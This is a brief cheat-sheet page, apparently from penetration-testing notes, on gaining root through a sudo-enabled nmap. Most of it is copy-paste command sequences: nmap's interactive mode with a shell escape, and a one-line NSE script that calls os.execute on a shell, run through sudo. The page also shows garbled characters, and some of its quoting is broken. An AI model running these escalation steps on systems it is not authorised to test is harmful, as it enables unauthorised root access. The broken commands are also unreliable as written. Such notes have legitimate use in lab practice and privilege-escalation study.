Home

πŸ—ΊοΈNMAP Exploitation

NMAP Exploitation.

Nmap is scanner for network and OS detection. If nmap being misconfiguration used "sudo" or "administrator" it can lead to privilege escalation.

Exploit 1

Using sudo -l

-l using for listing all

Or

  • Run sudo nmap -- interactive or nmap --interactive

  • !bash or !sh

  • Whoami

It will escalate as root.

Exploit 2

Same as above, but this time --interactive not working. We need to play we environment a bit.

  • TF=$(mktemp)

  • echo β€˜os.execute(β€˜/bin/bash’)’ > $TF

  • Sudo -u root nmap --script=$TF

Or

  • echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

We now root. This technique used to run a script in nmap.

PreviousCHEAT SHEETNextCheat Ole tools

Last updated